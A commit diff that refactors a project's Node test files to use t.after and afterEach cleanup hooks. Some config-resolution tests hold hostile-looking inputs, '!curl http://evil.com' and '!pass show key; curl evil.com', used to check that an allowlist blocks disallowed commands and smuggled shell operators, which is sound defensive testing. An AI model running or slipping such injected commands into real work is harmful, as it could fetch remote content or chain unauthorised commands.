refactor(test): replace try/finally with beforeEach/afterEach in packages tests (#2390)

This commit is contained in:
Tom Boucher 2026-03-24 23:34:10 -04:00 committed by GitHub
parent 77460942ac
commit e4d21c40d0
7 changed files with 228 additions and 245 deletions

View file

@ -287,7 +287,7 @@ describe("AuthStorage — oauth credential for non-OAuth provider (#2083)", () =
assert.equal(key, undefined);
});
it("falls through to env var when openrouter has type:oauth credential", async () => {
it("falls through to env var when openrouter has type:oauth credential", async (t) => {
const storage = inMemory({
openrouter: {
type: "oauth",
@ -299,17 +299,17 @@ describe("AuthStorage — oauth credential for non-OAuth provider (#2083)", () =
// Simulate OPENROUTER_API_KEY being set via env
const origEnv = process.env.OPENROUTER_API_KEY;
try {
process.env.OPENROUTER_API_KEY = "sk-or-v1-env-key";
const key = await storage.getApiKey("openrouter");
assert.equal(key, "sk-or-v1-env-key");
} finally {
t.after(() => {
if (origEnv === undefined) {
delete process.env.OPENROUTER_API_KEY;
} else {
process.env.OPENROUTER_API_KEY = origEnv;
}
}
});
process.env.OPENROUTER_API_KEY = "sk-or-v1-env-key";
const key = await storage.getApiKey("openrouter");
assert.equal(key, "sk-or-v1-env-key");
});
it("falls through to fallback resolver when openrouter has type:oauth credential", async () => {

View file

@ -48,37 +48,37 @@ function makeThrowingExtension(eventType: string, error: Error): Extension {
}
describe("ExtensionRunner.emitToolCall", () => {
it("catches throwing extension handler and routes to emitError", async () => {
it("catches throwing extension handler and routes to emitError", async (t) => {
const dir = mkdtempSync(join(tmpdir(), "runner-test-"));
try {
const sessionManager = SessionManager.create(dir, dir);
const authStorage = AuthStorage.create();
const modelRegistry = new ModelRegistry(authStorage, join(dir, "models.json"));
const throwingExt = makeThrowingExtension("tool_call", new Error("handler crashed"));
const runtime = makeMinimalRuntime();
const runner = new ExtensionRunner([throwingExt], runtime, dir, sessionManager, modelRegistry);
const errors: any[] = [];
runner.onError((err) => errors.push(err));
const event: ToolCallEvent = {
type: "tool_call",
toolCallId: "test-123",
toolName: "test_tool",
input: {},
} as ToolCallEvent;
const result = await runner.emitToolCall(event);
// Should not throw — error is caught and routed to emitError
assert.equal(result, undefined);
assert.equal(errors.length, 1);
assert.equal(errors[0].error, "handler crashed");
assert.equal(errors[0].event, "tool_call");
assert.equal(errors[0].extensionPath, "/test/throwing-ext");
} finally {
t.after(() => {
rmSync(dir, { recursive: true, force: true });
}
});
const sessionManager = SessionManager.create(dir, dir);
const authStorage = AuthStorage.create();
const modelRegistry = new ModelRegistry(authStorage, join(dir, "models.json"));
const throwingExt = makeThrowingExtension("tool_call", new Error("handler crashed"));
const runtime = makeMinimalRuntime();
const runner = new ExtensionRunner([throwingExt], runtime, dir, sessionManager, modelRegistry);
const errors: any[] = [];
runner.onError((err) => errors.push(err));
const event: ToolCallEvent = {
type: "tool_call",
toolCallId: "test-123",
toolName: "test_tool",
input: {},
} as ToolCallEvent;
const result = await runner.emitToolCall(event);
// Should not throw — error is caught and routed to emitError
assert.equal(result, undefined);
assert.equal(errors.length, 1);
assert.equal(errors[0].error, "handler crashed");
assert.equal(errors[0].event, "tool_call");
assert.equal(errors[0].extensionPath, "/test/throwing-ext");
});
});

View file

@ -1,66 +1,54 @@
import assert from "node:assert/strict";
import { describe, it } from "node:test";
import { describe, it, afterEach } from "node:test";
import { mkdtempSync, readFileSync, rmSync, existsSync } from "node:fs";
import { join } from "node:path";
import { tmpdir } from "node:os";
import { atomicWriteFileSync } from "./fs-utils.js";
describe("atomicWriteFileSync", () => {
it("writes file content atomically", () => {
const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
try {
const filePath = join(dir, "test.txt");
atomicWriteFileSync(filePath, "hello world");
assert.equal(readFileSync(filePath, "utf-8"), "hello world");
} finally {
let dir: string;
afterEach(() => {
if (dir) {
rmSync(dir, { recursive: true, force: true });
}
});
it("writes file content atomically", () => {
dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
const filePath = join(dir, "test.txt");
atomicWriteFileSync(filePath, "hello world");
assert.equal(readFileSync(filePath, "utf-8"), "hello world");
});
it("overwrites existing file atomically", () => {
const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
try {
const filePath = join(dir, "test.txt");
atomicWriteFileSync(filePath, "first");
atomicWriteFileSync(filePath, "second");
assert.equal(readFileSync(filePath, "utf-8"), "second");
} finally {
rmSync(dir, { recursive: true, force: true });
}
dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
const filePath = join(dir, "test.txt");
atomicWriteFileSync(filePath, "first");
atomicWriteFileSync(filePath, "second");
assert.equal(readFileSync(filePath, "utf-8"), "second");
});
it("does not leave .tmp file after successful write", () => {
const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
try {
const filePath = join(dir, "test.txt");
atomicWriteFileSync(filePath, "content");
assert.equal(existsSync(filePath + ".tmp"), false);
} finally {
rmSync(dir, { recursive: true, force: true });
}
dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
const filePath = join(dir, "test.txt");
atomicWriteFileSync(filePath, "content");
assert.equal(existsSync(filePath + ".tmp"), false);
});
it("supports Buffer content", () => {
const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
try {
const filePath = join(dir, "test.bin");
const buf = Buffer.from([0x00, 0x01, 0x02, 0xff]);
atomicWriteFileSync(filePath, buf);
const result = readFileSync(filePath);
assert.deepEqual(result, buf);
} finally {
rmSync(dir, { recursive: true, force: true });
}
dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
const filePath = join(dir, "test.bin");
const buf = Buffer.from([0x00, 0x01, 0x02, 0xff]);
atomicWriteFileSync(filePath, buf);
const result = readFileSync(filePath);
assert.deepEqual(result, buf);
});
it("supports encoding parameter", () => {
const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
try {
const filePath = join(dir, "test.txt");
atomicWriteFileSync(filePath, "utf8 content", "utf-8");
assert.equal(readFileSync(filePath, "utf-8"), "utf8 content");
} finally {
rmSync(dir, { recursive: true, force: true });
}
dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
const filePath = join(dir, "test.txt");
atomicWriteFileSync(filePath, "utf8 content", "utf-8");
assert.equal(readFileSync(filePath, "utf-8"), "utf8 content");
});
});

View file

@ -38,21 +38,20 @@ describe("resolveConfigValue — non-command values", () => {
});
describe("resolveConfigValue — command allowlist enforcement", () => {
it("blocks a disallowed command and returns undefined", () => {
it("blocks a disallowed command and returns undefined", (t) => {
const stderrChunks: string[] = [];
const originalWrite = process.stderr.write.bind(process.stderr);
process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => {
stderrChunks.push(chunk.toString());
return true;
};
try {
const result = resolveConfigValue("!curl http://evil.com");
assert.equal(result, undefined);
assert.ok(stderrChunks.some((line) => line.includes("curl")));
} finally {
t.after(() => {
process.stderr.write = originalWrite;
}
});
const result = resolveConfigValue("!curl http://evil.com");
assert.equal(result, undefined);
assert.ok(stderrChunks.some((line) => line.includes("curl")));
});
it("blocks another disallowed command (rm)", () => {
@ -65,7 +64,7 @@ describe("resolveConfigValue — command allowlist enforcement", () => {
assert.equal(result, undefined);
});
it("allows a safe command prefix to proceed to execution", () => {
it("allows a safe command prefix to proceed to execution", (t) => {
// `pass` is unlikely to be installed in CI, so we just verify it does NOT
// return undefined due to the allowlist check — it may return undefined if
// the binary is absent, but the block path must not be taken.
@ -76,16 +75,15 @@ describe("resolveConfigValue — command allowlist enforcement", () => {
stderrChunks.push(chunk.toString());
return true;
};
try {
resolveConfigValue("!pass show nonexistent-entry-for-test");
const blocked = stderrChunks.some((line) =>
line.includes("Blocked disallowed command")
);
assert.equal(blocked, false, "pass should not be blocked by the allowlist");
} finally {
t.after(() => {
process.stderr.write = originalWrite;
}
});
resolveConfigValue("!pass show nonexistent-entry-for-test");
const blocked = stderrChunks.some((line) =>
line.includes("Blocked disallowed command")
);
assert.equal(blocked, false, "pass should not be blocked by the allowlist");
});
});
@ -130,61 +128,58 @@ describe("resolveConfigValue — shell operator bypass prevention", () => {
assert.equal(result, undefined);
});
it("writes stderr warning when shell operators detected", () => {
it("writes stderr warning when shell operators detected", (t) => {
const stderrChunks: string[] = [];
const originalWrite = process.stderr.write.bind(process.stderr);
process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => {
stderrChunks.push(chunk.toString());
return true;
};
try {
resolveConfigValue("!pass show key; curl evil.com");
assert.ok(stderrChunks.some((line) => line.includes("shell operators")));
} finally {
t.after(() => {
process.stderr.write = originalWrite;
}
});
resolveConfigValue("!pass show key; curl evil.com");
assert.ok(stderrChunks.some((line) => line.includes("shell operators")));
});
});
describe("resolveConfigValue — caching", () => {
it("caches the result of a blocked command", () => {
it("caches the result of a blocked command", (t) => {
const callCount = { n: 0 };
const originalWrite = process.stderr.write.bind(process.stderr);
process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => {
callCount.n++;
return true;
};
try {
resolveConfigValue("!curl http://evil.com");
resolveConfigValue("!curl http://evil.com");
// The block warning should only fire once; the second call hits the cache
// before reaching the allowlist check, so stderr count is 1.
assert.equal(callCount.n, 1);
} finally {
t.after(() => {
process.stderr.write = originalWrite;
}
});
resolveConfigValue("!curl http://evil.com");
resolveConfigValue("!curl http://evil.com");
// The block warning should only fire once; the second call hits the cache
// before reaching the allowlist check, so stderr count is 1.
assert.equal(callCount.n, 1);
});
it("clearConfigValueCache resets cached entries", () => {
it("clearConfigValueCache resets cached entries", (t) => {
const stderrChunks: string[] = [];
const originalWrite = process.stderr.write.bind(process.stderr);
process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => {
stderrChunks.push(chunk.toString());
return true;
};
try {
resolveConfigValue("!curl http://evil.com");
assert.equal(stderrChunks.length, 1);
clearConfigValueCache();
resolveConfigValue("!curl http://evil.com");
assert.equal(stderrChunks.length, 2);
} finally {
t.after(() => {
process.stderr.write = originalWrite;
}
});
resolveConfigValue("!curl http://evil.com");
assert.equal(stderrChunks.length, 1);
clearConfigValueCache();
resolveConfigValue("!curl http://evil.com");
assert.equal(stderrChunks.length, 2);
});
});

View file

@ -1,5 +1,5 @@
import assert from "node:assert/strict";
import { describe, it } from "node:test";
import { describe, it, afterEach } from "node:test";
import { mkdtempSync, rmSync } from "node:fs";
import { join } from "node:path";
import { tmpdir } from "node:os";
@ -22,44 +22,44 @@ function makeAssistantMessage(input: number, output: number, cacheRead = 0, cach
}
describe("SessionManager usage totals", () => {
it("tracks assistant usage incrementally without rescanning entries", () => {
const dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-"));
try {
const manager = SessionManager.create(dir, dir);
let dir: string;
manager.appendMessage({ role: "user", content: [{ type: "text", text: "hello" }] } as any);
manager.appendMessage(makeAssistantMessage(10, 5, 3, 2, 0.25));
manager.appendMessage(makeAssistantMessage(7, 4, 1, 0, 0.1));
assert.deepEqual(manager.getUsageTotals(), {
input: 17,
output: 9,
cacheRead: 4,
cacheWrite: 2,
cost: 0.35,
});
} finally {
afterEach(() => {
if (dir) {
rmSync(dir, { recursive: true, force: true });
}
});
it("tracks assistant usage incrementally without rescanning entries", () => {
dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-"));
const manager = SessionManager.create(dir, dir);
manager.appendMessage({ role: "user", content: [{ type: "text", text: "hello" }] } as any);
manager.appendMessage(makeAssistantMessage(10, 5, 3, 2, 0.25));
manager.appendMessage(makeAssistantMessage(7, 4, 1, 0, 0.1));
assert.deepEqual(manager.getUsageTotals(), {
input: 17,
output: 9,
cacheRead: 4,
cacheWrite: 2,
cost: 0.35,
});
});
it("resets totals when starting a new session", () => {
const dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-"));
try {
const manager = SessionManager.create(dir, dir);
manager.appendMessage(makeAssistantMessage(5, 5, 0, 0, 0.05));
assert.equal(manager.getUsageTotals().input, 5);
dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-"));
const manager = SessionManager.create(dir, dir);
manager.appendMessage(makeAssistantMessage(5, 5, 0, 0, 0.05));
assert.equal(manager.getUsageTotals().input, 5);
manager.newSession();
assert.deepEqual(manager.getUsageTotals(), {
input: 0,
output: 0,
cacheRead: 0,
cacheWrite: 0,
cost: 0,
});
} finally {
rmSync(dir, { recursive: true, force: true });
}
manager.newSession();
assert.deepEqual(manager.getUsageTotals(), {
input: 0,
output: 0,
cacheRead: 0,
cacheWrite: 0,
cost: 0,
});
});
});

View file

@ -60,26 +60,26 @@ describe("edit-diff", () => {
assert.match(result.diff, /CHANGED/);
});
it("computes diffs for preview without native helpers", async () => {
it("computes diffs for preview without native helpers", async (t) => {
const dir = mkdtempSync(join(tmpdir(), "edit-diff-test-"));
try {
const file = join(dir, "sample.ts");
writeFileSync(file, "const title = “Hello”;\n", "utf-8");
const result = await computeEditDiff(
file,
"const title = \"Hello\";\n",
"const title = \"Hi\";\n",
dir,
);
assert.ok(!("error" in result), "expected a diff result");
if (!("error" in result)) {
assert.equal(result.firstChangedLine, 1);
assert.match(result.diff, /\+1 const title = "Hi";/);
}
} finally {
t.after(() => {
rmSync(dir, { recursive: true, force: true });
});
const file = join(dir, "sample.ts");
writeFileSync(file, "const title = “Hello”;\n", "utf-8");
const result = await computeEditDiff(
file,
"const title = \"Hello\";\n",
"const title = \"Hi\";\n",
dir,
);
assert.ok(!("error" in result), "expected a diff result");
if (!("error" in result)) {
assert.equal(result.firstChangedLine, 1);
assert.match(result.diff, /\+1 const title = "Hi";/);
}
});
});

View file

@ -1,5 +1,5 @@
import assert from "node:assert/strict";
import { describe, it, mock } from "node:test";
import { describe, it, afterEach } from "node:test";
import { mkdtempSync, rmSync, readFileSync, existsSync } from "node:fs";
import { join } from "node:path";
import { tmpdir } from "node:os";
@ -15,84 +15,84 @@ function wait(ms: number): Promise<void> {
}
describe("MemoryStorage debounced persistence", () => {
it("multiple rapid mutations only trigger one persist write", async () => {
const dir = makeTmpDir();
const dbPath = join(dir, "test.db");
try {
const storage = await MemoryStorage.create(dbPath);
let dir: string;
const initialStat = readFileSync(dbPath);
const initialMtime = initialStat.length;
storage.upsertThreads([
{ threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" },
]);
storage.upsertThreads([
{ threadId: "t2", filePath: "/b.txt", fileSize: 200, fileMtime: 2000, cwd: "/proj" },
]);
storage.upsertThreads([
{ threadId: "t3", filePath: "/c.txt", fileSize: 300, fileMtime: 3000, cwd: "/proj" },
]);
const afterMutationsBuf = readFileSync(dbPath);
assert.deepEqual(
afterMutationsBuf,
initialStat,
"File should not have been written yet (debounce window has not elapsed)",
);
await wait(700);
const afterDebounceBuf = readFileSync(dbPath);
assert.notDeepEqual(
afterDebounceBuf,
initialStat,
"File should have been written after debounce window elapsed",
);
const stats = storage.getStats();
assert.equal(stats.totalThreads, 3);
storage.close();
} finally {
afterEach(() => {
if (dir) {
rmSync(dir, { recursive: true, force: true });
}
});
it("multiple rapid mutations only trigger one persist write", async () => {
dir = makeTmpDir();
const dbPath = join(dir, "test.db");
const storage = await MemoryStorage.create(dbPath);
const initialStat = readFileSync(dbPath);
const initialMtime = initialStat.length;
storage.upsertThreads([
{ threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" },
]);
storage.upsertThreads([
{ threadId: "t2", filePath: "/b.txt", fileSize: 200, fileMtime: 2000, cwd: "/proj" },
]);
storage.upsertThreads([
{ threadId: "t3", filePath: "/c.txt", fileSize: 300, fileMtime: 3000, cwd: "/proj" },
]);
const afterMutationsBuf = readFileSync(dbPath);
assert.deepEqual(
afterMutationsBuf,
initialStat,
"File should not have been written yet (debounce window has not elapsed)",
);
await wait(700);
const afterDebounceBuf = readFileSync(dbPath);
assert.notDeepEqual(
afterDebounceBuf,
initialStat,
"File should have been written after debounce window elapsed",
);
const stats = storage.getStats();
assert.equal(stats.totalThreads, 3);
storage.close();
});
it("close() flushes pending changes immediately without waiting for debounce", async () => {
const dir = makeTmpDir();
dir = makeTmpDir();
const dbPath = join(dir, "test.db");
try {
const storage = await MemoryStorage.create(dbPath);
const storage = await MemoryStorage.create(dbPath);
const initialBuf = readFileSync(dbPath);
const initialBuf = readFileSync(dbPath);
storage.upsertThreads([
{ threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" },
]);
storage.upsertThreads([
{ threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" },
]);
const beforeCloseBuf = readFileSync(dbPath);
assert.deepEqual(
beforeCloseBuf,
initialBuf,
"File should not have been written yet (debounce window has not elapsed)",
);
const beforeCloseBuf = readFileSync(dbPath);
assert.deepEqual(
beforeCloseBuf,
initialBuf,
"File should not have been written yet (debounce window has not elapsed)",
);
storage.close();
storage.close();
const afterCloseBuf = readFileSync(dbPath);
assert.notDeepEqual(
afterCloseBuf,
initialBuf,
"File should have been written immediately on close()",
);
const afterCloseBuf = readFileSync(dbPath);
assert.notDeepEqual(
afterCloseBuf,
initialBuf,
"File should have been written immediately on close()",
);
const reopened = await MemoryStorage.create(dbPath);
const stats = reopened.getStats();
assert.equal(stats.totalThreads, 1, "Data should be persisted and readable after close");
reopened.close();
} finally {
rmSync(dir, { recursive: true, force: true });
}
const reopened = await MemoryStorage.create(dbPath);
const stats = reopened.getStats();
assert.equal(stats.totalThreads, 1, "Data should be persisted and readable after close");
reopened.close();
});
});